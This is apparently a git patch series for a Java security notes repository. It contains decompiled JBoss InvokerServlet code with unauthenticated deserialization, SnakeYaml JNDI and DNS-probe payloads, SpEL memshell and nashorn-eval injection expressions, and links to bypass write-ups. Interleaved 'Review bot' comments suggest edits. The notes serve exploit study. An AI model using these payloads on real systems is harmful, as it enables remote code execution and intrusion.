+import org.jboss.logging.Logger; +import org.jboss.mx.util.MBeanServerLocator; + +public class ReadOnlyAccessFilter implements Filter { + private static Logger log = Logger.getLogger(ReadOnlyAccessFilter.class); + private FilterConfig filterConfig = null; + private String readOnlyContext; + private Map namingMethodMap; + + public ReadOnlyAccessFilter() { + } + + public void init(FilterConfig filterConfig) throws ServletException { + this.filterConfig = filterConfig; + if (filterConfig != null) { + this.readOnlyContext = filterConfig.getInitParameter("readOnlyContext"); + String invokerName = filterConfig.getInitParameter("invokerName"); + + try { + MBeanServer mbeanServer = MBeanServerLocator.locateJBoss(); + ObjectName mbean = new ObjectName(invokerName); + this.namingMethodMap = (Map)mbeanServer.getAttribute(mbean, "MethodMap"); + } catch (Exception var5) { + log.error("Failed to init ReadOnlyAccessFilter", var5); + throw new ServletException("Failed to init ReadOnlyAccessFilter", var5); + } + } + + } + + public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { + HttpServletRequest httpRequest = (HttpServletRequest)request; + Principal user = httpRequest.getUserPrincipal(); + if (user == null && this.readOnlyContext != null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + MarshalledInvocation mi = null; + + try { + mi = (MarshalledInvocation)ois.readObject(); + } catch (ClassNotFoundException var10) { + throw new ServletException("Failed to read MarshalledInvocation", var10); + } + + request.setAttribute("MarshalledInvocation", mi); + mi.setMethodMap(this.namingMethodMap); + Method m = mi.getMethod(); + if (m != null) { + this.validateAccess(m, mi); + } + } + + chain.doFilter(request, response); + } + + public void destroy() { + } + + public String toString() { + if (this.filterConfig == null) { + return "NamingAccessFilter()"; + 
} else { + StringBuffer sb = new StringBuffer("NamingAccessFilter("); + sb.append(this.filterConfig); + sb.append(")"); + return sb.toString(); + } + } + + private void validateAccess(Method m, MarshalledInvocation mi) throws ServletException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("Checking against readOnlyContext: " + this.readOnlyContext); + } + + String methodName = m.getName(); + if (!methodName.equals("lookup")) { + throw new ServletException("Only lookups against " + this.readOnlyContext + " are allowed"); + } else { + Object[] args = mi.getArguments(); + Object arg = args.length > 0 ? args[0] : ""; + String name; + if (arg instanceof String) { + name = (String)arg; + } else { + name = arg.toString(); + } + + if (trace) { + log.trace("Checking lookup(" + name + ") against: " + this.readOnlyContext); + } + + if (!name.startsWith(this.readOnlyContext)) { + throw new ServletException("Lookup(" + name + ") is not under: " + this.readOnlyContext); + } + } + } +} +``` +org.jboss.invocation.http.servlet.InvokerServlet +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.InvocationTargetException; +import java.security.AccessController; +import java.security.Principal; +import java.security.PrivilegedAction; +import javax.management.MBeanServer; +import javax.management.MalformedObjectNameException; +import javax.management.ObjectName; +import javax.servlet.ServletConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletOutputStream; +import javax.servlet.http.HttpServlet; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.jboss.invocation.InvocationException; +import 
org.jboss.invocation.MarshalledInvocation; +import org.jboss.invocation.MarshalledValue; +import org.jboss.logging.Logger; +import org.jboss.mx.util.JMXExceptionDecoder; +import org.jboss.mx.util.MBeanServerLocator; +import org.jboss.security.SecurityAssociation; +import org.jboss.system.Registry; + +public class InvokerServlet extends HttpServlet { + private static Logger log = Logger.getLogger(InvokerServlet.class); + private static String REQUEST_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"; + private static String RESPONSE_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"; + private MBeanServer mbeanServer; + private ObjectName localInvokerName; + + public InvokerServlet() { + } + + public void init(ServletConfig config) throws ServletException { + super.init(config); + + try { + String name = config.getInitParameter("invokerName"); + if (name != null) { + this.localInvokerName = new ObjectName(name); + log.debug("localInvokerName=" + this.localInvokerName); + } + } catch (MalformedObjectNameException var3) { + throw new ServletException("Failed to build invokerName", var3); + } + + this.mbeanServer = MBeanServerLocator.locateJBoss(); + if (this.mbeanServer == null) { + throw new ServletException("Failed to locate the MBeanServer"); + } + } + + public void destroy() { + } + + protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("processRequest, ContentLength: " + request.getContentLength()); + log.trace("processRequest, ContentType: " + request.getContentType()); + } + + Boolean returnValueAsAttribute = (Boolean)request.getAttribute("returnValueAsAttribute"); + + try { + response.setContentType(RESPONSE_CONTENT_TYPE); + MarshalledInvocation mi = (MarshalledInvocation)request.getAttribute("MarshalledInvocation"); + if 
(mi == null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + mi = (MarshalledInvocation)ois.readObject(); + ois.close(); + } + + if (mi.getPrincipal() == null && mi.getCredential() == null) { + mi.setPrincipal(InvokerServlet.GetPrincipalAction.getPrincipal()); + mi.setCredential(InvokerServlet.GetCredentialAction.getCredential()); + } + + Object[] params = new Object[]{mi}; + String[] sig = new String[]{"org.jboss.invocation.Invocation"}; + ObjectName invokerName = this.localInvokerName; + if (invokerName == null) { + Integer nameHash = (Integer)mi.getObjectName(); + invokerName = (ObjectName)Registry.lookup(nameHash); + if (invokerName == null) { + throw new ServletException("Failed to find invoker name for hash(" + nameHash + ")"); + } + } + + Object value = this.mbeanServer.invoke(invokerName, "invoke", params, sig); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + request.setAttribute("returnValue", value); + } else { + MarshalledValue mv = new MarshalledValue(value); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } catch (Throwable var13) { + Throwable t = JMXExceptionDecoder.decode(var13); + if (t instanceof InvocationTargetException) { + InvocationTargetException ite = (InvocationTargetException)t; + t = ite.getTargetException(); + } + + InvocationException appException = new InvocationException(t); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + log.debug("Invoke threw exception", t); + request.setAttribute("returnValue", appException); + } else if (response.isCommitted()) { + log.error("Invoke threw exception, and response is already committed", t); + } else { + response.resetBuffer(); + MarshalledValue mv = new MarshalledValue(appException); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new 
ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } + + } + + protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + public String getServletInfo() { + return "An HTTP to JMX invocation servlet"; + } + + private static class GetCredentialAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetCredentialAction(); + + private GetCredentialAction() { + } + + public Object run() { + Object credential = SecurityAssociation.getCredential(); + return credential; + } + + static Object getCredential() { + Object credential = AccessController.doPrivileged(ACTION); + return credential; + } + } + + private static class GetPrincipalAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetPrincipalAction(); + + private GetPrincipalAction() { + } + + public Object run() { + Principal principal = SecurityAssociation.getPrincipal(); + return principal; + } + + static Principal getPrincipal() { + Principal principal = (Principal)AccessController.doPrivileged(ACTION); + return principal; + } + } +} +``` From dd1fe2e2aba2fdfc7696cab2bea729323bdca28d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 10 Jul 2022 13:49:49 +0800 Subject: [PATCH 022/257] Update Readme.md --- .../Velocity/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
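Review bot: The InvokerServlet listing is added without a single comment, so the lines that matter in processRequest are easy to miss: when the "MarshalledInvocation" request attribute is null, the request body is wrapped in `new ObjectInputStream(sis)` and `ois.readObject()` runs before the cast to MarshalledInvocation, and both doGet and doPost route there. Suggest a short paragraph under the closing fence that names those lines and states that the cast is not a type check on the incoming stream, so the note can end on the mitigation (restrict access to the servlet, or filter classes before readObject) instead of leaving the reader with raw decompiler output.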
diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index 3a3feb9..678fd9a 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -1,4 +1,5 @@ # 真实例子 Confluence CVE-2019-3396 +Jira CVE-2019-11581 From 284f248d9b86e59849cc61c4da798896b4f94d8d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 10 Jul 2022 14:03:42 +0800 Subject: [PATCH 023/257] Update Readme.md --- .../Velocity/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index 678fd9a..f6c05c2 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -1,5 +1,6 @@ # 真实例子 Confluence CVE-2019-3396 + Jira CVE-2019-11581 From e9ada9eb1e24bd231112b09ac1b07002d373c587 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 12:52:41 +0800 Subject: [PATCH 024/257] Update Readme.md --- SnakeYaml/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index cf6bec6..e699ddd 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -8,6 +8,8 @@ https://xz.aliyun.com/t/10655 +限制了class,不过存在class bean中有object属性 https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ + 加载本地 ```java String data2 = "!!javax.script.ScriptEngineManager [\n" + From 167818cf08b5cf2b3a5e63a6d0019d18fa99e5e1 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 13:17:26 +0800 Subject: [PATCH 025/257] Update Readme.md --- SnakeYaml/Readme.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index e699ddd..89be881 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -23,3 +23,9 @@ String data2 = "!!javax.script.ScriptEngineManager [\n" + ```java String poc = "[!!判断的类全类名 []: 0, !!java.net.URL [null, \"http://ixvoxg.dnslog.cn\"]: 1]"; ``` + +## 其他链 一般是jndi + +``` +!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true} +``` From 6f60ab9cd377302f64b3b0edc8108b4437ece805 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 13:20:48 +0800 Subject: [PATCH 026/257] Update Readme.md --- SnakeYaml/Readme.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index 89be881..b14e92b 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -3,12 +3,12 @@ ## 不出网利用 >通过写文件然后本地加载rce -//todo 写一个工具 去完成 +//todo 写一个工具 去完成 已经完成了 https://xz.aliyun.com/t/10655 -限制了class,不过存在class bean中有object属性 https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ +限制了class,不过存在class bean中有object属性 参考: https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ 加载本地 ```java @@ -29,3 +29,5 @@ String data2 = "!!javax.script.ScriptEngineManager [\n" + ``` !!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true} ``` + +参考: https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E From ef6fb63bae480bb06898555d39d777b1cc2ce472 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 14:19:49 +0800 Subject: [PATCH 027/257] Update Readme.md --- shell/EL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) 
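Review bot: In the first hunk of the 026 change to SnakeYaml/Readme.md, the edited line keeps the `//todo 写一个工具 去完成` marker and only appends 已经完成了 ("already done"), which leaves a TODO that is no longer one. Replace the line with a link to the finished tool, or drop it. The `参考:` prefix added in the same hunk is a good fix for the sentence that ran straight into its URL; the second hunk's `参考:` line would read better if it said which part of the section it is the source for, since it sits after the JdbcRowSetImpl block with no context.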
diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index 24f8a89..56f6390 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -1,5 +1,7 @@ # EL +https://xz.aliyun.com/t/7692 + ## 回显 https://forum.butian.net/share/886 From 8dead4aea8192692eadb399e15f38b3695a8acbe Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 18 Jul 2022 21:53:16 +0800 Subject: [PATCH 028/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 415bb41..54e1208 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -146,3 +146,4 @@ + 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** + 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) + 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** ++ 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) From fd140a0a0a4cd4c9f4807283ae56ef151b4b9cc4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 15 Aug 2022 23:31:07 +0800 Subject: [PATCH 029/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 54e1208..8945633 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -147,3 +147,4 @@ + 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) + 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** + 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) ++ 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** From faa7c2e1ecca0d6c88ffc8ae5e3fb05b847274ef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 16 Aug 2022 13:05:33 +0800 Subject: [PATCH 030/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8945633..3684b0a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -148,3 +148,4 @@ + 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** + 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) + 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** ++ 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** From 1167c93eaf24f3a624f3de3351f974627ec9a080 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 20 Aug 2022 00:16:26 +0800 Subject: [PATCH 031/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3684b0a..675c06c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -149,3 +149,4 @@ + 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) + 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** + 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** ++ 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** From 0d0387308e0654181dad0fc745a47270c051b96e Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 22 Aug 2022 15:01:15 +0800 Subject: [PATCH 032/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 675c06c..43d561b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -150,3 +150,4 @@ + 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** + 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** + 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** ++ 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** From e60dddad0ab644b13234f3ecb11bf41d840dcee8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 1 Sep 2022 16:54:36 +0800 Subject: [PATCH 033/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 43d561b..17bc0da 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -151,3 +151,4 @@ + 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** + 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** + 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** ++ 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** 
From d81bc7d9f602bc8a0dae54484812397d93521ea0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 2 Sep 2022 17:25:55 +0800 Subject: [PATCH 034/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 17bc0da..a2df6be 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -152,3 +152,4 @@ + 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** + 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** + 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** ++ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** From 3ad5b0c446a9c11ad2b43d161f07958db950d625 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 10 Sep 2022 00:07:27 +0800 Subject: [PATCH 035/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a2df6be..a1a5905 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -153,3 +153,4 @@ + 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** + 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** ++ 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** From a2e3591d7a3c6462fb2bec06c45ab15d71eefaa4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 10 Sep 2022 23:37:20 +0800 Subject: [PATCH 036/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a1a5905..74e5f5e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -154,3 +154,4 @@ + 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** + 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** ++ 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** From 4d2bd5b6a7f5249428a5e40916489669e9a34c36 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 11 Sep 2022 10:56:24 +0800 Subject: [PATCH 037/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 74e5f5e..28e3f61 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -155,3 +155,4 @@ + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** + 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** + 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** ++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) From c7d87f5c8612076aa446c176d4fdb206cfa92882 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 15 Sep 2022 20:51:20 +0800 Subject: [PATCH 038/257] Create Readme.md --- Undertow/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 Undertow/Readme.md diff --git a/Undertow/Readme.md b/Undertow/Readme.md new file mode 100644 index 0000000..16d8a83 --- /dev/null +++ b/Undertow/Readme.md @@ -0,0 +1,5 @@ +# Undertow + +https://blog.csdn.net/hollis_chuang/article/details/104470945 + +http://blog.hubwiz.com/2016/12/01/webserver-Undertow/ From b63b51024c3f51494e8d85f269904f4ae037e6be Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 13:35:31 +0800 Subject: [PATCH 039/257] Update Readme.md --- shell/SPEL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index c83f309..2e57962 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -1,5 +1,7 @@ # SPEL +>new关键字大小写可以绕过 + ## poc ```java @@ -45,6 +47,7 @@ T(org.springframework.cglib.core.ReflectUtils).defineClass('Singleton',T(com.sun #{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()} +${''.getClass().forName('java.script.ScriptEngineManager').newInstance().getEngineByName("nashorn").eval(#request.getHeader('User-Agent'))} echo From aff8eaec8c511a05428772a3ea5701e0e3280d80 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 17:10:08 +0800 Subject: [PATCH 040/257] Update Readme.md --- shell/SPEL/Readme.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 2e57962..b0acffd 100644 --- a/shell/SPEL/Readme.md +++ 